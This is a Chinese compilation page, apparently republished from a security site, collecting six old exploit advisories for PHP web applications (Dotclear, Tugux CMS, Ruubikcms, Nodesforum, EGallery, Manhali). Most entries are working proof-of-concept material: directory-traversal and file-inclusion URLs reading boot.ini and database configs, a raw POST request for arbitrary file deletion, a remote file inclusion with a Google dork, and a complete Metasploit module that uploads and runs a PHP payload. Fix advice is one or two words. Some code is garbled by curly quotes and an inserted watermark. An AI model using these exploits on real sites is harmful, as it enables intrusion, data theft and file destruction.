以下是小编精心整理的Dotclear 2.4.2任意文件上传缺陷及修复,本文共6篇,仅供参考,希望能够帮助到大家。
篇1:Dotclear 2.4.2任意文件上传缺陷及修复
标题: dotclear-2.4.2 (Swf) File Upload Vulnerability
作者: T0x!c Malik_99@hotmail.fr
程序下载地址: fr.dotclear.org/download
影响版本: 2.4.2
测试系统: [Windows Xp]
测试证明:
/path/inc/swf/swfupload.swf
你可以用php格式上传文件
例如: c99.php, shell.gif.php, 等等
www.2cto.co提供修复
加强验证
篇2:Tugux CMS 1.2 (pid) 任意文件删除缺陷及修复漏洞预警
Tugux CMS 1.2 (pid) Remote Arbitrary File Deletion Vulnerability
Vendor: Tugux Studios
Product web page: www.tugux.com
Affected version: 1.2
Summary: Tugux CMS 是一款免费开源的内容管理系统
(CMS) and application that powers the entire web.
Desc: Input passed to the 'pid' parameter in administrator/delete_page_parse.php
is not properly sanitised before being used to delete files. This can be exploited
to delete files with the permissions of the web server via directory traversal
sequences passed within the 'pid' parameter.
------------------------------------------------------------------------------
/administrator/delete_page_parse.php:
------------------------------------------------------------------------------
1:
2: ///post form. data
3: $id=$_POST['pid'];
4:
5: $pic1 = (“slides/$id/image_01.jpg”);
6: if (file_exists($pic1)) {
7: unlink($pic1);
8: }
9: $dir = “slides/$id”;
10: rmdir($dir);
11:
12: include_once “../scripts/connect_to_mysql.php”;
13: $query = mysqli_query($myConnection, “DELETE FROM pages WHERE id='$id' ”) or die (mysqli_error($myConnection));
14: echo '
15:
16: Operation completed.Your page has been DELETED.
17: Click Here to go back';
18: exit;
19: ?>
------------------------------------------------------------------------------
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab
Advisory ID: ZSL--5024
Advisory URL: www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5024.php
02.04.2011
--
POST /tugux/administrator/delete_page_parse.php HTTP/1.1
Host: www.2cto.com
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 175
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
------x
Content-Disposition: form-data; name=“pid”
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../boot.ini
------x--
篇3:Ruubikcms v 1.1.0文件包含缺陷及修复
技术分析:
source of /extra/image.php:
1: if (!isset($_GET['f']) OR empty($_GET['f'])) die(“Please specify 2: image.”);
3: $fpath = BASE_DIR.$_GET['f'];
4: if (!is_file($fpath)) die(“File does not exist.”);
5:
6: // file size in bytes
7: // $fsize = filesize($fpath);
8:
9: // get mime type
10: $mtype = '';
11:
12: if (function_exists('mime_content_type')) {
13: $mtype = mime_content_type($fpath);
14: } elseif (function_exists('finfo_file')) {
15: $finfo = finfo_open(FILEINFO_MIME); // return mime type
16: $mtype = finfo_file($finfo, $fpath);
17: finfo_close($finfo);
18: }
19:
20: if ($mtype == '') {
21: $mtype = “image/jpeg”;
22: }
23:
24: header(“Content-type: $mtype”);
25: readfile($fpath); <--------------------- LFI
测试方法:
/[ruubikcms1.1.0]/extra/image.php?f=../../../../../../../../boot.ini
/[ruubikcms1.1.0]/extra/image.php?f=../../../../../../../../[localfile]
修复:过滤
篇4:Nodesforum 1.059远程文件包含缺陷及修复
# Exploit Title: nodesforum 1.059 Remote File Inclusion Vulnerability
# Google Dork: inurl: powered by Nodesforum
# Date: 6/23/
# Author: bd0rk ( bd0rk[at]hackermail.com )
# Software-Download: home.nodesforum.com/download?file=nodesforum_1.059_with_bbcode_1.004.zip
# Tested on: Ubuntu-Linux / WinVista
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code in 3rd_party_limits.php line 6 - 8
--------------------------------------------------------------------------------------------------------------
$limits_cache_url=$_nodesforum_code_path.cache/.$_nodesforum_db_table_name_modifier._3rd_party_limits.php;
if(@filemtime($limits_cache_url) && @filemtime($limits_cache_url)>(time-(24*3600*14)))
{include($limits_cache_url);}
The parameter $limits_cache_url is declared with the other parameter $_nodesforum_code_path
So we can use the declared.
PoC: /nodesforum/3rd_party_limits.php?_nodesforum_code_path=[RemoteShellCode]
Fixtip: Declare $_nodesforum_code_path, likewise!
Greetings: Kathrin J., Perle, x0r_32 and ZUBAIR ANJUM ;-)
#### The 22 years old, german Hacker bd0rk #### <---white-hat
篇5:EGallery PHP文件上传缺陷及修复漏洞预警
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' =>“EGallery PHP File Upload Vulnerability”,
'Description' =>%q{
This module exploits a vulnerability found in EGallery 1.2 By abusing the
uploadify.php file, a malicious user can upload a file to the egallery/ directory
without any authentication, which results in arbitrary code execution. The module
has been tested successfully on Ubuntu 10.04.
},
'License' =>MSF_LICENSE,
'Author' =>
[
'Sammy FORGIT', # Discovery, PoC
'juan' # Metasploit module
],
'References' =>
[
['OSVDB', '83891'],
['BID', '54464'],
['URL', 'www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html']
],
'Payload' =>
{
'BadChars' =>“\x00”
},
'DefaultOptions' =>
{
'ExitFunction' =>“none”
},
'Platform' =>['php'],
'Arch' =>ARCH_PHP,
'Targets' =>
[
['EGallery 1.2', {}]
],
'Privileged' =>false,
'DisclosureDate' =>“Jul 08 ”,
'DefaultTarget' =>0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to EGallery', '/sample'])
], self.class)
end
def check
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
res = send_request_cgi({
'method' =>'GET',
'uri' =>“#{uri}egallery/uploadify.php”
})
if res and res.code == 200 and res.body.empty?
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
www.2cto.com
def exploit
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
peer = “#{rhost}:#{rport}”
payload_name = rand_text_alpha(rand(10) + 5) + '.php'
boundary = Rex::Text.rand_text_hex(7)
post_data = “--#{boundary}\r\n”
post_data << “Content-Disposition: form-data; name=\”Filename\“\r\n\r\n”
post_data << “#{payload_name}\r\n”
post_data << “--#{boundary}\r\n”
post_data << “Content-Disposition: form-data; name=\”folder\“\r\n\r\n”
post_data << “#{uri}\r\n”
post_data << “--#{boundary}\r\n”
post_data << “Content-Disposition: form-data; name=\”Filedata\“; filename=\”#{payload_name}\“\r\n\r\n”
post_data << “
post_data << payload.encoded
post_data << ” ?>\r\n“
post_data << ”--#{boundary}--\r\n“
print_status(”#{peer} - Sending PHP payload (#{payload_name})“)
res = send_request_cgi({
'method' =>'POST',
'uri' =>”#{uri}egallery/uploadify.php“,
'ctype' =>”multipart/form-data; boundary=#{boundary}“,
'data' =>post_data
})
# If the server returns 200 and the body contains our payload name,
# we assume we uploaded the malicious file successfully
if not res or res.code != 200 or res.body !~ /#{payload_name}/
print_error(”#{peer} - File wasn't uploaded, aborting!“)
return
end
print_status(”#{peer} - Executing PHP payload (#{payload_name})“)
# Execute our payload
res = send_request_cgi({
'method' =>'GET',
'uri' =>”#{uri}#{payload_name}“
})
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either. Print the status code for debugging purposes.
if res and res.code != 200
print_status(”#{peer} - Server returned #{res.code.to_s}")
end
end
end
篇6:Manhali v1.8本地文件包含缺陷及修复
标题 Manhali v1.8 Local File Inclusion Vulnerability
作者: L0n3ly-H34rT l0n3ly_h34rt@hotmail.com
程序开发: www.manhali.com/
下载地址: sourceforge.net/projects/manhali/files/manhali_1.8.zip/download
影响版本 : 1.8 (或许老版也受影响,未检查)
测试系统: Linux/Windows
############################################
# P.O.C :
/manhali/includes/download.php?f=../includes/dbconfig.php
############################################
# Greetz to my friendz
★缺陷作文
文档为doc格式
